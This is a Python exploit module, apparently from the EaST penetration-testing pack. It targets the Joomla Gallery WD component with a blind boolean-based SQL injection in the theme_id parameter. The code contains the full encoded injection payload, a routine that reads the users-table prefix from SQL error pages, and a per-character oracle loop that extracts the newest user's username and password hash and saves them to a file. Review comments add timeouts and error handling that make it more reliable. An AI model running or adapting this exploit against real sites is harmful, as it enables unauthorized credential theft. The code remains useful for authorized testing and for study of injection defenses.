#!/usr/bin/env python
# The exploit is a part of EaST pack - use only under the license agreement
# specified in LICENSE.txt in your EaST distribution
import sys
import time
import urllib2
import string
sys.path.append("./core")
from Sploit import Sploit
# Module metadata.  INFO['NAME'] is also used as the exploit instance's
# self.name; the other keys are descriptive only (no CVE id is recorded).
INFO = {
    'NAME': "ef_joomla_gallery_wd_bsqli",
    'DESCRIPTION': "Joomla Gallery WD - SQL Injection Vulnerability",
    'VENDOR': "http://web-dorado.com/",
    "CVE Name": "",
    "NOTES": """
Joomla Gallery WD is not filtering data in theme parameter theme_id
and hence affected from SQL injection vulnerability.
Tested against Joomla Gallery WD on Windows XP SP3.
""",
    'CHANGELOG': "11 Sep 2015. Written by Gleg team.",
    'PATH': 'Exploits/',
}
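# Must be in every module, to be set by framework
OPTIONS = {}
OPTIONS["HOST"] = '127.0.0.1'
OPTIONS["PORT"] = 80
OPTIONS["SSL"] = False
OPTIONS["BASEPATH"] = '/'
# Candidate characters tried, in this order, for every position of the
# extracted "username:password" string (see exploit.guess_letter).  The
# extraction loop stops at the first position whose real character is not
# in POOL, so a gap here silently truncates the result.  The original
# alphabet only covered letters, digits, ':' (the separator), '-', '/' and
# '$'; '.' is added because bcrypt-style hashes ($2y$...) use '.' as well as
# '/', and '_' / '@' because usernames may contain them.  New characters are
# appended, never inserted, so every result the old alphabet could recover
# is still found after exactly the same sequence of requests.
POOL = string.ascii_letters + string.digits + ':' + '-' + '/' + '$' + '.' + '_' + '@'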
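class exploit(Sploit):
    """Blind, boolean-based SQL injection in Joomla Gallery WD (theme_id).

    The payload built in args() sends
    ``theme_id=1 RLIKE (SELECT CASE WHEN substring(<username:password>, pos, 1)
    = char(N) THEN 4 ELSE 0x28 END)`` to the gallerybox view.  Whether the
    server accepts the request is then used as a one-bit oracle (see
    guess_letter) to recover ``username:password`` of the row selected by
    ``order by registerDate desc limit 1`` -- i.e. the most recently
    registered user -- one character at a time.  The users table name is
    taken from the target's own SQL error page (see guess_table_name), so
    the target must be echoing database errors to the client.

    log(), finish() and writefile() are not defined here and presumably
    come from the Sploit base class; their exact contracts are not visible
    in this file.
    """

    # Per-request timeout in seconds.  urllib2.urlopen() has no default
    # timeout, so without one a stalled target hangs the extraction loop
    # (up to len(POOL) requests per recovered character) indefinitely.
    TIMEOUT = 30

    def __init__(self, host = "", port = 0, logger = None):
        """Set default connection parameters; args() overrides them from OPTIONS."""
        Sploit.__init__(self, logger = logger)
        self.name = INFO['NAME']
        self.ssl = False
        self.port = port
        self.host = host
        self.basepath = '/'
        self.url = ''      # payload URL template, built by args()
        self.table = ''    # users table name, found by guess_table_name()
        self.state = "running"
        return

    def args(self):
        """Read HOST/PORT/SSL/BASEPATH from the framework and build the payload URL.

        The URL keeps three str.format placeholders -- {table}, {pos} and
        {char} -- that guess_letter() fills in per request.

        NOTE(review): this rebinds ``self.args`` from the bound method to the
        option dict, so calling args() twice on one instance (e.g. check()
        followed by run()) raises TypeError.  Left unchanged because the
        framework may read ``self.args`` as that dict -- confirm.
        NOTE(review): bool() of a non-empty string such as 'False' is True;
        confirm the framework hands SSL over as a real bool.
        """
        self.args = Sploit.args(self, OPTIONS)
        self.host = self.args.get('HOST', self.host)
        self.port = int(self.args.get('PORT', self.port))
        self.ssl = bool(self.args.get('SSL', self.ssl))
        self.basepath = self.args.get('BASEPATH', self.basepath)
        self.url = self.make_url('/index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1%20RLIKE%20%28SELECT%20%28CASE%20WHEN%20%28substring%28%28select%20concat%28username,char%2858%29,password%29%20from%20{table}%20order%20by%20registerDate%20desc%20limit%201%29,{pos},1%29=char%28{char}%29%29%20THEN%204%20ELSE%200x28%20END%29%29')
        return

    def make_url(self, path = ''):
        """Return scheme://host:port + basepath + path for the current settings.

        ``path`` is passed as a format *argument*, so any {placeholders}
        inside it survive untouched for later formatting.
        """
        return '{}{}:{}{}{}'.format(self.prot(), self.host, self.port, self.basepath, path)

    def prot(self):
        """Return the URL scheme prefix selected by self.ssl."""
        return 'https://' if self.ssl else 'http://'

    def check(self):
        """Return 1 if the base URL answers without error, else 0.

        Any failure -- urllib2.URLError, its HTTPError subclass (a 4xx/5xx
        reply), a socket timeout or any other request error -- counts as
        'not reachable' and is logged.  This tests reachability only; it does
        not confirm the injection.
        """
        self.args()
        self.log( "Testing %s:%d" % ( self.host, self.port ) )
        try:
            fd = urllib2.urlopen(self.make_url(), timeout=self.TIMEOUT)
        except Exception as er:
            self.log('Target not reachable: %s' % er)
            return 0
        fd.close()   # the original never closed the response object
        return 1

    def guess_table_name(self):
        """Recover ``<prefix>_users`` from the target's SQL error page.

        The payload template is sent *unformatted* -- the literal ``{table}``
        placeholder makes the query malformed -- and the HTTP 500 body is
        expected to echo the failing statement; the table prefix is the text
        between '* FROM ' and '_bwg_theme'.

        Returns None when the reply is not an HTTP 500, the request fails
        before an HTTP status exists, or the body lacks both markers.  (The
        original crashed with TypeError on a non-error reply, and returned
        the raw error body as the table name when '_bwg_theme' was missing.)
        """
        try:
            urllib2.urlopen(self.url, timeout=self.TIMEOUT)
        except urllib2.HTTPError as e:
            if e.code != 500:
                return None
            body = e.read()
        except Exception as e:
            # URLError without .code (refused/reset/DNS), socket timeout, ...
            self.log('Prefix request failed: %s' % e)
            return None
        else:
            # the malformed query was accepted: no error page to mine
            return None
        _, sep, rest = body.partition('* FROM ')
        if not sep:
            return None
        prefix, sep, _ = rest.partition('_bwg_theme')
        if not sep or not prefix:
            return None
        return prefix + '_users'

    def guess_letter(self, pos):
        """Return the character at 1-based position ``pos`` of the secret, or None.

        Each candidate in POOL is tried in order.  A request that succeeds,
        or that fails with HTTP 503 (also counted as a hit by the original;
        the reason is not recorded), is taken as 'condition true' and its
        candidate returned; any other HTTP error code means 'false'.
        Failures with no HTTP status (connection refused, timeout, ...) are
        logged and treated as 'false' -- the original raised AttributeError
        on ``e.code`` there and aborted the whole run.

        None means no candidate matched: either the end of the string or a
        character outside POOL, in which case extraction stops early.

        NOTE(review): if the users table has a case-insensitive collation and
        the ``= char(N)`` comparison is not byte-exact on the target, 'A' and
        'a' both match and the lowercase candidate (first in POOL) wins; a
        BINARY comparison in the payload would remove that ambiguity.  Not
        changed here because it could not be verified against a target.
        """
        for c in POOL:
            url = self.url.format(pos=pos, char=ord(c), table=self.table)
            try:
                resp = urllib2.urlopen(url, timeout=self.TIMEOUT)
            except urllib2.HTTPError as e:
                if e.code == 503:
                    return c
                continue
            except Exception as e:
                self.log('Request failed at position %d, candidate %r: %s' % (pos, c, e))
                continue
            resp.close()
            return c
        return None

    def run(self):
        """Extract ``username:password`` character by character and save it.

        Returns 1 (after finish(True) and writefile()) when at least one
        character was recovered, 0 otherwise.  The payload orders by
        registerDate desc, so the row read is the most recently registered
        user -- not necessarily an administrator, despite the log text.
        """
        self.args()
        self.log('Begin extracting admin\'s credentials')
        self.log('This may take about 15 minutes')
        self.table = self.guess_table_name()
        if not self.table:
            self.log('Prefix of tables not found')
            self.finish(False)
            return 0
        self.log('Found table {}'.format(self.table))
        result = ''
        pos = 1
        char = self.guess_letter(pos)
        while char:
            result += char
            self.log('Current result: ' + result)
            pos += 1
            char = self.guess_letter(pos)
        if result:
            self.log('End with: {}'.format(result))
            self.writefile(result)
            self.finish(True)
            return 1
        self.log('Failed')
        self.finish(False)
        return 0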
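if __name__ == '__main__':
    # Only the framework ("tool") mode exists so far; a true standalone mode
    # is not implemented.  The host/port passed here are just defaults --
    # run() calls args(), which may override them from OPTIONS.
    # print() with a single argument behaves the same under Python 2 and 3;
    # the original used the Python 2-only print statement.
    print("Running exploit %s .. " % INFO['NAME'])
    e = exploit('', 80)
    e.run()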